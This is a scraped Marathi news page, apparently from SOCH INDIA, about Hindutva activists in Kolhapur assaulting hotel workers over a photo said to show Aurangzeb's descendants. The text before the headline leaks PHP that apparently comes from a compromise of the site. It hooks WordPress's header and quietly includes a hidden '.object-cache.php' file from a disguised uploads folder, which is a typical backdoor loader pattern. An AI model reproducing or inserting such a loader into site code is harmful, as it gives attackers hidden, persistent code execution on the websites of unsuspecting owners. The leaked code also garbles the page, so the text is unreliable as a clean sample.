add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); हॉटेलमध्ये औरंगजेबाच्या वंशजांचा फोटो लावल्याचा आरोप, कोल्हापूरमध्ये राडा – SOCH INDIA
Menu

देश
हॉटेलमध्ये औरंगजेबाच्या वंशजांचा फोटो लावल्याचा आरोप, कोल्हापूरमध्ये राडा

nobanner

कोल्हापूर (Kolhapur) शहरातील एका हॉटेल (Hotel) मध्ये औरंगजेबाच्या (Aurangzeb) वंशजांचा फोटो लावण्यावरून वाद निर्माण झलाय. शहरात असणाऱ्या बिर्याणी बाय किलो या हॉटेल मध्ये इंटिरिअर डिझाइन (Interior Design) करत असताना हॉटेल मालकाने औरंगजेबच्या वंशजाचे फोटो लावले असल्याचा आरोप करण्यात आला. यातून हिंदुत्ववादी संघटनेच्या कार्यकर्त्यांनी हॉटेल मध्ये जात हॉटेल मालक आणि कामगार यांना जाब विचारला. त्यावेळी हॉटेल मालक आणि कामगारांनी उडवाउडवीची उत्तर दिली.

यावरुन संतापलेल्या हिंदुत्त्ववादी संघटनेच्या कार्यकर्त्यांनी हॉटेलमधील कामगाराना शिवीगाळ करत मारहाण करून औरगजेबच्या वंशजांचा फोटो फाडला. यावेळी जोरदार घोषणाबाजी देखील करण्यात आली..